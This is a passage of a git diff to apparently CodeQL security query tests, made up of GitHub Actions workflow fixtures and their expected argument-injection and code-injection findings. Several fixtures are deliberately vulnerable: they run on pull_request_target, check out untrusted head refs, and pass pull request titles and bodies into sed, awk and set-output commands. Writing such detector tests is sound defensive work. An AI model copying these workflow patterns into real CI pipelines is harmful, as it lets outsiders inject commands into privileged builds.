FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | semmle.label | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml index 09e540a0f1b0..59ea1564bdd0 100644 --- a/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml +++ b/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml @@ -1,15 +1,18 @@ name: Argument injection on: - issues: - types: [opened, edited] + pull_request_target: jobs: test1: runs-on: ubuntu-latest env: - TITLE: ${{github.event.issue.title}} + TITLE: ${{github.event.pull_request.title}} steps: + - name: Checkout + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} - run: echo "s/FOO/$TITLE/g" - run: sed "s/FOO/$TITLE/g" - run: echo "foo" | sed "s/FOO/$TITLE/g" > bar @@ -28,3 +31,6 @@ jobs: -e 's##${{ env.sot_repo }}#' \ -e 's##${TITLE}#' \ .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky + - run: | + BODY=$(git log --format=%s) + sed "s/FOO/$BODY/g" > /tmp/foo diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected index b5df9a2cbd3c..326cb935f7c0 100644 --- a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected @@ -1,27 +1,30 @@ edges -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | nodes -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | -| .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | -| .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | -| .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | -| .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | -| .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | -| .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | +| .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | +| .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | +| .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | +| .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | +| .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | +| .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths #select -| .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | sed | -| .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | sed | -| .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | sed | -| .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | awk | -| .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | sed | -| .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | -| .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | -| .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | +| .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | sed | +| .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | sed | +| .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | sed | +| .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | awk | +| .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | sed | +| .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | +| .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | +| .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | +| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | git | +| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected index 73413f51a392..90e7101e5fd6 100644 --- a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected @@ -1,19 +1,20 @@ edges -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | nodes -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | -| .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | -| .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | -| .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | -| .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | -| .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | -| .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | +| .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | +| .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | +| .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | +| .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | +| .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | +| .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml index 153ebc5b733e..5aeb9aac7c52 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml @@ -1,26 +1,29 @@ -on: push +on: + pull_request_target: + +permissions: + actions: write jobs: job1: runs-on: ubuntu-latest - outputs: job_output: ${{ steps.step5.outputs.MSG5 }} steps: - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} - id: step0 uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event['head_commit']['message'] }} + source: ${{ github.event['pull_request']['body'] }} find: 'foo' replace: '' - id: step1 env: BODY: ${{ steps.step0.outputs.value}} - shell: powershell - run: | - Write-Output "::set-output name=MSG::$ENV{BODY}" + run: echo "::set-output name=MSG::${BODY}" - id: step2 env: MSG: ${{steps.step1.outputs.MSG}} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml index 3cab86f3171b..d149df2bd7ca 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml @@ -19,7 +19,9 @@ jobs: uses: actions/checkout@v4 - name: Extract Jira Key - run: echo ISSUE_KEY=$(echo 